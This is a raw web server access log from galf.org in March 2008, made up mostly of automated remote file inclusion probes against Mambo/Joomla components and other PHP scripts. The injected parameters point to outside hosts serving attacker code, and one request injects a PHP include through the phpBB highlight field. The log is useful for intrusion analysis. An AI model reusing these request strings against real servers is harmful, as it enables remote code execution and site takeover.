69.64.76.150 - - [23/Mar/2008:17:32:05 -0700] "GET /logs/access_080114.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.147.142.67 - - [23/Mar/2008:17:32:13 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.147.142.67 - - [23/Mar/2008:17:32:13 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.147.142.67 - - [23/Mar/2008:17:32:13 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:33:02 -0700] "GET /index2.php?s=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:33:02 -0700] "GET /index2.php?s=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.53.125 - - [23/Mar/2008:17:34:24 -0700] "GET //includes/cart.inc.php?dir_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.214.230 - - [23/Mar/2008:17:34:43 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.25.23.133 - - [23/Mar/2008:17:39:12 -0700] "GET //errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.23.133 - - [23/Mar/2008:17:39:14 -0700] "GET /logs//errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.23.133 - - [23/Mar/2008:17:39:18 -0700] "GET /logs/access.log//errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.147.142.67 - - [23/Mar/2008:17:41:09 -0700] "GET /logs/access_080225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.166.61.155 - - [23/Mar/2008:17:42:39 -0700] "GET //becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:17:43:56 -0700] "GET /logs/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:17:43:56 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:17:44:51 -0700] "GET /logs/access_071022.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:17:44:52 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:17:44:52 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 6801 "-" "libwww-perl/5.808" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:17:45:15 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:17:45:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:17:46:01 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:47:15 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:17:48:19 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 851968 "-" "-" "www.galf.org"
77.91.224.7 - - [23/Mar/2008:17:49:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [23/Mar/2008:17:49:02 -0700] "GET / HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:49:38 -0700] "GET /logs/access.log/index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:49:38 -0700] "GET /index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:17:49:38 -0700] "GET /logs/index2.php?ID=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.150.2 - - [23/Mar/2008:17:49:57 -0700] "GET /logs/access_080114.log/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.17.150.2 - - [23/Mar/2008:17:49:57 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.17.150.2 - - [23/Mar/2008:17:49:57 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:50:32 -0700] "GET /index.php?go=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.231.206 - - [23/Mar/2008:17:50:32 -0700] "GET /index.php?go=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:17:50:36 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:17:50:37 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.25.144.250 - - [23/Mar/2008:17:50:53 -0700] "GET /logs/access_071008.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:51:03 -0700] "GET /logs/access_080218.log/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:51:03 -0700] "GET /index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:51:04 -0700] "GET /logs/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:51:21 -0700] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:51:25 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:51:29 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:51:53 -0700] "GET /logs/access_071008.log/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.150.2 - - [23/Mar/2008:17:53:38 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_simpleboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:17:54:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:17:54:58 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:17:55:02 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [23/Mar/2008:17:55:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [23/Mar/2008:17:55:02 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [23/Mar/2008:17:55:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [23/Mar/2008:17:55:15 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.230.15.10 - - [23/Mar/2008:17:56:05 -0700] "GET /logs/scripts.log/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:56:05 -0700] "GET /index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:17:56:07 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:17:56:28 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.129.206 - - [23/Mar/2008:17:57:21 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
219.94.129.206 - - [23/Mar/2008:17:57:21 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
219.94.129.206 - - [23/Mar/2008:17:57:21 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:17:57:30 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:17:57:44 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:17:57:45 -0700] "GET /index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.209.230 - - [23/Mar/2008:17:58:47 -0700] "GET /logs/access_071008.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
77.91.224.17 - - [23/Mar/2008:17:58:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [23/Mar/2008:17:58:54 -0700] "GET /cendoc.php HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:17:59:14 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:35 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:35 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:36 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:18:00:55 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:18:00:55 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:55 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:00:56 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:00:58 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:00:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:18:01:45 -0700] "GET /logs/access_071112.log/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:01:56 -0700] "GET /logs/access_071028.log/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:02:39 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:02:39 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:02:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:02:45 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:02:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:03:08 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:03:09 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:03:09 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.193.222.218 - - [23/Mar/2008:18:04:48 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
213.193.222.218 - - [23/Mar/2008:18:04:48 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:04:49 -0700] "GET /logs/access_071231.log/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:04:49 -0700] "GET /scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:04:49 -0700] "GET /logs/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.253.99.164 - - [23/Mar/2008:18:05:20 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.253.99.164 - - [23/Mar/2008:18:05:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.253.99.164 - - [23/Mar/2008:18:05:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:05:25 -0700] "GET /logs/access_080218.log/scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:05:39 -0700] "GET /logs/access_071210.log/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:05:39 -0700] "GET /main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:05:39 -0700] "GET /logs/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:18:05:44 -0700] "GET /logs/access_071112.log/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:05:57 -0700] "GET /scanhttp://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.193.222.218 - - [23/Mar/2008:18:05:57 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
213.193.222.218 - - [23/Mar/2008:18:05:57 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:18:06:01 -0700] "GET /logs/access_080225.log//admin/includes/admin_header.php?level=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:18:06:01 -0700] "GET //admin/includes/admin_header.php?level=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:18:06:01 -0700] "GET /logs//admin/includes/admin_header.php?level=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:06:16 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:18:06:17 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:06:36 -0700] "GET /logs/access.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.234.144.44 - - [23/Mar/2008:18:06:37 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "galf.org"
85.234.144.44 - - [23/Mar/2008:18:06:37 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 6801 "-" "libwww-perl/5.808" "galf.org"
208.186.169.183 - - [23/Mar/2008:18:06:47 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:18:06:47 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 6806 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:18:07:05 -0700] "GET /canal.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
